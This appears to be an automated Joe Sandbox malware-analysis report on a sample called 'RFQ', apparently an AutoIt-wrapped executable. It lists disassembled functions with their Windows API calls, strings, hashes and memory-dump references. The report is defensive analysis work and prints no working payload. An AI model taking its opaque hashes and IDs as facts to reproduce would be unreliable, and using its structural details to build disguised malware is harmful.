                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                    • Opcode ID: a718abe34639e11a5773f565f5df25267ed81f0f8ffb426c25293e421c2bc89c
                                                                                                                                                    • Instruction ID: a2e542edd064faa413b4c586eeb3af2157bd7fa16206279f44088f4d921f19d4
                                                                                                                                                    • Opcode Fuzzy Hash: a718abe34639e11a5773f565f5df25267ed81f0f8ffb426c25293e421c2bc89c
                                                                                                                                                    • Instruction Fuzzy Hash: DB113C71200701BFE7399B65EC48F677BB9EBC5B51F14826CF602962A0EB75EC009A30
                                                                                                                                                    Function 00776CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,007A2F49), ref: 00776CB9
                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00776CCA
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00776CDA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 48322524-0
                                                                                                                                                    • Opcode ID: aeded13f2567d1987a0a9e807090568d1372a3ad27400e52bf48112b70959362
                                                                                                                                                    • Instruction ID: 074ac3ac44504c402aaf596f3891018d59e76c0ac515ed5e44331254e5ebbee0
                                                                                                                                                    • Opcode Fuzzy Hash: aeded13f2567d1987a0a9e807090568d1372a3ad27400e52bf48112b70959362
                                                                                                                                                    • Instruction Fuzzy Hash: 50E0D835810819578620673CEC0D8E9376CDA05379F108715F575C11D0F778ED0455E9
                                                                                                                                                    Function 00743B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3728558374-2766056989
                                                                                                                                                    • Opcode ID: 796dfc07fc158879b17ec340b54cf605b3e5a0d584c77524b47f38574deb3a84
                                                                                                                                                    • Instruction ID: 318b0283284ed154deb1a8f45c987971226576975660abf98d847052766632de
                                                                                                                                                    • Opcode Fuzzy Hash: 796dfc07fc158879b17ec340b54cf605b3e5a0d584c77524b47f38574deb3a84
                                                                                                                                                    • Instruction Fuzzy Hash: 5572B171E04108DFCF24DF94C885ABEB7B5FF49300F14805AE919AB291D779AE45CBA1
                                                                                                                                                    Function 00743200 Relevance: 1.0, Instructions: 986COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3964851224-0
                                                                                                                                                    • Opcode ID: d21effc4756596b7f463b8402ff27c46800a96e0191d9dfabbc49d21def537b6
                                                                                                                                                    • Instruction ID: 646d31a55f036a298168c9cbf4f67cbdedb03971e3c0ff0388a9e016dc29c000
                                                                                                                                                    • Opcode Fuzzy Hash: d21effc4756596b7f463b8402ff27c46800a96e0191d9dfabbc49d21def537b6
                                                                                                                                                    • Instruction Fuzzy Hash: D1927670608241CFD724DF18C484B6ABBE1BF89304F14895DF98A8B2A2D779ED45CB92
                                                                                                                                                    Function 0073E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0073E959
                                                                                                                                                    • timeGetTime.WINMM ref: 0073EBFA
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0073ED2E
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0073ED3F
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0073ED4A
                                                                                                                                                    • LockWindowUpdate.USER32(00000000), ref: 0073ED79
                                                                                                                                                    • DestroyWindow.USER32 ref: 0073ED85
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073ED9F
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 007A5270
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 007A59F7
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 007A5A05
                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007A5A19
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                                                                                    • API String ID: 2641332412-570651680
                                                                                                                                                    • Opcode ID: f3277084205f4716305f6c3fe8b6f8162c17713adcd3bd53076a1bdae0b45051
                                                                                                                                                    • Instruction ID: 4b805e85b435d6f118c910a0db1e98b4e4e6216195ecc4c72913d7677f332d64
                                                                                                                                                    • Opcode Fuzzy Hash: f3277084205f4716305f6c3fe8b6f8162c17713adcd3bd53076a1bdae0b45051
                                                                                                                                                    • Instruction Fuzzy Hash: AF628F70504340DBEB25DF24C889BAA77E4BF85304F144A6DF9869B2D2DB7DA844CB62
                                                                                                                                                    Function 00765C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___createFile.LIBCMT ref: 00765EC3
                                                                                                                                                    • ___createFile.LIBCMT ref: 00765F04
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00765F2D
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00765F34
                                                                                                                                                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00765F47
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00765F6A
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00765F73
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00765F7C
                                                                                                                                                    • __set_osfhnd.LIBCMT ref: 00765FAC
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 00766016
                                                                                                                                                    • __close_nolock.LIBCMT ref: 0076603C
                                                                                                                                                    • __chsize_nolock.LIBCMT ref: 0076606C
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 0076607E
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 00766176
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 0076618B
                                                                                                                                                    • __close_nolock.LIBCMT ref: 007661EB
                                                                                                                                                      • Part of subcall function 0075EA9C: CloseHandle.KERNELBASE(00000000,007DEEF4,00000000,?,00766041,007DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0075EAEC
                                                                                                                                                      • Part of subcall function 0075EA9C: GetLastError.KERNEL32(?,00766041,007DEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0075EAF6
                                                                                                                                                      • Part of subcall function 0075EA9C: __free_osfhnd.LIBCMT ref: 0075EB03
                                                                                                                                                      • Part of subcall function 0075EA9C: __dosmaperr.LIBCMT ref: 0075EB25
                                                                                                                                                      • Part of subcall function 00757C0E: __getptd_noexit.LIBCMT ref: 00757C0E
                                                                                                                                                    • __lseeki64_nolock.LIBCMT ref: 0076620D
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00766342
                                                                                                                                                    • ___createFile.LIBCMT ref: 00766361
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0076636E
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00766375
                                                                                                                                                    • __free_osfhnd.LIBCMT ref: 00766395
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 007663C3
                                                                                                                                                    • __wsopen_helper.LIBCMT ref: 007663DD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 3896587723-2766056989
                                                                                                                                                    • Opcode ID: f6517a589bc2a5cb98749f65dda0b03e71a61d063e288adf83bc875da7dec98f
                                                                                                                                                    • Instruction ID: 611c70529905b5d3ed7f8c2011d3b8bb516a466dd1476c9a9d0f79a22fb82ec4
                                                                                                                                                    • Opcode Fuzzy Hash: f6517a589bc2a5cb98749f65dda0b03e71a61d063e288adf83bc875da7dec98f
                                                                                                                                                    • Instruction Fuzzy Hash: 86222471A0060A9FEF299F68DC95BFD7B61EB05314F684228EC229B2D2C77D8D40D791
                                                                                                                                                    Function 0077FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FA96
                                                                                                                                                    • _wcschr.LIBCMT ref: 0077FAA4
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FABB
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077FACA
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077FAE8
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FB09
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077FBE6
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FC0B
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FC1D
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077FC32
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077FC47
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077FC59
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077FC6E
                                                                                                                                                      • Part of subcall function 0077BFA4: _wcscmp.LIBCMT ref: 0077C03E
                                                                                                                                                      • Part of subcall function 0077BFA4: __wsplitpath.LIBCMT ref: 0077C083
                                                                                                                                                      • Part of subcall function 0077BFA4: _wcscpy.LIBCMT ref: 0077C096
                                                                                                                                                      • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0A9
                                                                                                                                                      • Part of subcall function 0077BFA4: __wsplitpath.LIBCMT ref: 0077C0CE
                                                                                                                                                      • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0E4
                                                                                                                                                      • Part of subcall function 0077BFA4: _wcscat.LIBCMT ref: 0077C0F7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$t2~
                                                                                                                                                    • API String ID: 2955681530-1003817682
                                                                                                                                                    • Opcode ID: 9a980b9fd4fcd630ec849374e098846fa22b75ebbcec0f888da7012d4f6bc984
                                                                                                                                                    • Instruction ID: 8388e37923995e3b1e10da1745b67e0219d910f5cdb552a5357f9ac529a8f164
                                                                                                                                                    • Opcode Fuzzy Hash: 9a980b9fd4fcd630ec849374e098846fa22b75ebbcec0f888da7012d4f6bc984
                                                                                                                                                    • Instruction Fuzzy Hash: 8591C472504705DFDF20EB64C995F9AB3E8BF84310F008869F94997292DB79FA48CB91
                                                                                                                                                    Function 00733F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00733F86
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00733FB0
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733FC1
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00733FDE
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00733FEE
                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00734004
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00734013
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: e557714a13c2cbc203033d7967774e035ebb10cbef0208bd3f1c1cf86f888e1e
                                                                                                                                                    • Instruction ID: 0bea655df1d60e61011f44ab1e5c7f1aadf946ef70308610bf293729258e0f7a
                                                                                                                                                    • Opcode Fuzzy Hash: e557714a13c2cbc203033d7967774e035ebb10cbef0208bd3f1c1cf86f888e1e
                                                                                                                                                    • Instruction Fuzzy Hash: 5221CAB5900218EFDB10DF95E889BDD7BB4FB08700F40821AF511E62A0DBB94944CF99
                                                                                                                                                    Function 0077BFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0077BDB4: __time64.LIBCMT ref: 0077BDBE
                                                                                                                                                      • Part of subcall function 00734517: _fseek.LIBCMT ref: 0073452F
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077C083
                                                                                                                                                      • Part of subcall function 00751DFC: __wsplitpath_helper.LIBCMT ref: 00751E3C
                                                                                                                                                    • _wcscpy.LIBCMT ref: 0077C096
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077C0A9
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077C0CE
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077C0E4
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077C0F7
                                                                                                                                                    • _wcscmp.LIBCMT ref: 0077C03E
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C65D
                                                                                                                                                      • Part of subcall function 0077C56D: _wcscmp.LIBCMT ref: 0077C670
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0077C2A1
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077C338
                                                                                                                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0077C34E
                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0077C35F
                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0077C371
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2378138488-0
                                                                                                                                                    • Opcode ID: ccc2938d3fe0202649fa022d6bbf1a86ba11dea779e419d8d7cf4bb1ceaba725
                                                                                                                                                    • Instruction ID: ce5670d59cc0cf7ba5a796b3a31c8edbe0037d238bf43c0043286da1a8622a59
                                                                                                                                                    • Opcode Fuzzy Hash: ccc2938d3fe0202649fa022d6bbf1a86ba11dea779e419d8d7cf4bb1ceaba725
                                                                                                                                                    • Instruction Fuzzy Hash: 09C13DB1900219EFDF25DF94CC85EDEB7BCAF49340F0080AAF609E6152DB749A848F65
                                                                                                                                                    Function 00733742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 957 733742-733762 959 7337c2-7337c4 957->959 960 733764-733767 957->960 959->960 961 7337c6 959->961 962 733769-733770 960->962 963 7337c8 960->963 964 7337ab-7337b3 DefWindowProcW 961->964 967 733776-73377b 962->967 968 73382c-733834 PostQuitMessage 962->968 965 7a1e00-7a1e2e call 732ff6 call 74e312 963->965 966 7337ce-7337d1 963->966 970 7337b9-7337bf 964->970 1000 7a1e33-7a1e3a 965->1000 971 7337d3-7337d4 966->971 972 7337f6-73381d SetTimer RegisterWindowMessageW 966->972 974 7a1e88-7a1e9c call 774ddd 967->974 975 733781-733783 967->975 969 7337f2-7337f4 968->969 969->970 976 7a1da3-7a1da6 971->976 977 7337da-7337ed KillTimer call 733847 call 73390f 971->977 972->969 979 73381f-73382a CreatePopupMenu 972->979 974->969 993 7a1ea2 974->993 980 733836-733845 call 74eb83 975->980 981 733789-73378e 975->981 985 7a1da8-7a1daa 976->985 986 7a1ddc-7a1dfb MoveWindow 976->986 977->969 979->969 980->969 989 7a1e6d-7a1e74 981->989 990 733794-733799 981->990 995 7a1dcb-7a1dd7 SetFocus 985->995 996 7a1dac-7a1daf 985->996 986->969 989->964 998 7a1e7a-7a1e83 call 76a5f3 989->998 991 7a1e58-7a1e68 call 7755bd 990->991 992 73379f-7337a5 990->992 991->969 992->964 992->1000 993->964 995->969 996->992 1001 7a1db5-7a1dc6 call 732ff6 996->1001 998->964 1000->964 1005 7a1e40-7a1e53 call 733847 call 734ffc 1000->1005 1001->969 1005->964
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 007337B3
                                                                                                                                                    • KillTimer.USER32(?,00000001), ref: 007337DD
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00733800
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0073380B
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 0073381F
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0073382E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                    • String ID: TaskbarCreated
                                                                                                                                                    • API String ID: 129472671-2362178303
                                                                                                                                                    • Opcode ID: fea5331b5aeb5644edbb5189b81d04e75090c3797b8d3da5cddff90a0f6c9213
                                                                                                                                                    • Instruction ID: 15696d246e95f7fce89152abf11c4d5189e7ae4154d17b7056830aeb68bc82c9
                                                                                                                                                    • Opcode Fuzzy Hash: fea5331b5aeb5644edbb5189b81d04e75090c3797b8d3da5cddff90a0f6c9213
                                                                                                                                                    • Instruction Fuzzy Hash: B84127F520414AEBFB346B289C8EFB93755F740341F848225F60692293DB6D9D50C766
                                                                                                                                                    Function 00733E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00733E79
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00733E88
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00733E9E
                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00733EB0
                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00733EC2
                                                                                                                                                      • Part of subcall function 00734024: LoadImageW.USER32(00730000,00000063,00000001,00000010,00000010,00000000), ref: 00734048
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00733F30
                                                                                                                                                      • Part of subcall function 00733F53: GetSysColorBrush.USER32(0000000F), ref: 00733F86
                                                                                                                                                      • Part of subcall function 00733F53: RegisterClassExW.USER32(00000030), ref: 00733FB0
                                                                                                                                                      • Part of subcall function 00733F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00733FC1
                                                                                                                                                      • Part of subcall function 00733F53: InitCommonControlsEx.COMCTL32(?), ref: 00733FDE
                                                                                                                                                      • Part of subcall function 00733F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00733FEE
                                                                                                                                                      • Part of subcall function 00733F53: LoadIconW.USER32(000000A9), ref: 00734004
                                                                                                                                                      • Part of subcall function 00733F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00734013
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
